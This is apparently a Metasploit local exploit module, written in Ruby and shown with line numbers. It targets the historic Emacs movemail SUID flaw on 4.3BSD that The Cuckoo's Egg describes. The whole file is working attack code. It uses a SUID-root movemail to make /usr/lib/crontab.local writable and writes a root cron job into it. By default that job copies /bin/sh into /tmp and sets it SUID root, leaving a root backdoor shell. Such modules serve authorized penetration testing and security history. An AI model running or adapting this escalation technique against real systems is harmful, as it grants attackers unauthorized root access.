Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7

8
  Rank = ExcellentRanking
9

10
  include Msf::Post::File
11
  prepend Msf::Exploit::Remote::AutoCheck
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'Emacs movemail Privilege Escalation',
18
        'Description' => %q{
19
          This module exploits a SUID installation of the Emacs movemail utility
20
          to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
21

22
          The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
23
        },
24
        'Author' => [
25
          'Markus Hess', # Discovery? atrun(8) exploit for sure
26
          'Cliff Stoll', # The Cuckoo's Egg hacker tracker
27
          'wvu' # Module and additional research
28
        ],
29
        'References' => [
30
          %w[URL https://en.wikipedia.org/wiki/Movemail],
31
          %w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
32
          %w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
33
          %w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
34
          %w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
35
          %w[URL https://mailutils.org/manual/html_node/movemail.html]
36
        ],
37
        'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
38
        'License' => MSF_LICENSE,
39
        'Platform' => 'unix',
40
        'Arch' => ARCH_CMD,
41
        'SessionTypes' => %w[shell],
42
        'Privileged' => true,
43
        'Payload' => { 'BadChars' => "\n", 'Encoder' => 'generic/none' },
44
        'Targets' => [['/usr/lib/crontab.local', {}]],
45
        'DefaultTarget' => 0,
46
        'DefaultOptions' => {
47
          'PAYLOAD' => 'cmd/unix/generic',
48
          'CMD' => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
49
        },
50
        'Notes' => {
51
          'Reliability' => [REPEATABLE_SESSION],
52
          'Stability' => [CRASH_SAFE],
53
          'SideEffects' => [ARTIFACTS_ON_DISK]
54
        }
55
      )
56
    )
57

58
    register_options([
59
      OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
60
    ])
61
  end
62

63
  def bin_path
64
    '/bin:/usr/bin:/usr/ucb:/etc'
65
  end
66

67
  def movemail
68
    datastore['MOVEMAIL']
69
  end
70

71
  def crontab_local
72
    '/usr/lib/crontab.local'
73
  end
74

75
  def crontab(cmd)
76
    "* * * * * root #{cmd}\n* * * * * root rm -f #{crontab_local}"
77
  end
78

79
  # uname(1) does not exist, technique from /etc/rc.local
80
  def is_43bsd?
81
    cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')
82
  end
83

84
  # id(1) does not exist
85
  def root?
86
    cmd_exec('whoami').include?('root')
87
  end
88

89
  # test -u does not exist
90
  def setuid_root?(path)
91
    cmd_exec("find #{path} -user root -perm -4000 -print").include?(path)
92
  end
93

94
  def setup
95
    super
96

97
    vprint_status("Setting a sane $PATH: #{bin_path}")
98

99
    case cmd_exec('echo $SHELL')
100
    when %r{/bin/sh}
101
      vprint_status('Current shell is /bin/sh')
102
      cmd_exec("PATH=#{bin_path}; export PATH")
103
    when %r{/bin/csh}
104
      vprint_status('Current shell is /bin/csh')
105
      cmd_exec("setenv PATH #{bin_path}")
106
    else
107
      vprint_bad('Current shell is unknown')
108
    end
109

110
    vprint_status("$PATH is #{cmd_exec('echo $PATH').chomp}")
111
  end
112

113
  def check
114
    unless is_43bsd?
115
      vprint_warning('System does not appear to be 4.3BSD')
116
    end
117

118
    unless file?(movemail)
119
      vprint_bad("#{movemail} not found")
120
      return CheckCode::Safe
121
    end
122

123
    unless movemail.end_with?('movemail')
124
      vprint_warning("#{movemail} has an unexpected name")
125
    end
126

127
    unless setuid_root?(movemail)
128
      vprint_status("Non-SUID-root #{movemail} found")
129
      return CheckCode::Detected
130
    end
131

132
    vprint_good("SUID-root #{movemail} found")
133
    CheckCode::Appears
134
  end
135

136
  def exploit
137
    if root?
138
      print_good('Session is already root, executing payload directly')
139
      return cmd_exec(payload.encoded)
140
    end
141

142
    # outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);
143
    if file?(crontab_local)
144
      fail_with(Failure::NoTarget, "#{crontab_local} already exists")
145
    end
146

147
    print_status('Preparing crontab with payload')
148
    tab = crontab(payload.encoded)
149
    vprint_line(tab)
150

151
    # umask (umask (0) & 0333);
152
    # (void) ftruncate (indesc, 0L);
153
    print_status("Creating writable #{crontab_local}")
154
    cmd_exec("(umask 0 && #{movemail} /dev/null #{crontab_local})")
155

156
    unless writable?(crontab_local)
157
      fail_with(Failure::NoAccess, "#{crontab_local} is not writable")
158
    end
159

160
    print_good("Writing crontab to #{crontab_local}")
161
    cmd_exec("echo '#{tab.gsub("'", "'\\\\''")}' > #{crontab_local}")
162
    print_warning('Please wait at least one minute for effect')
163
  end
164
end
165

166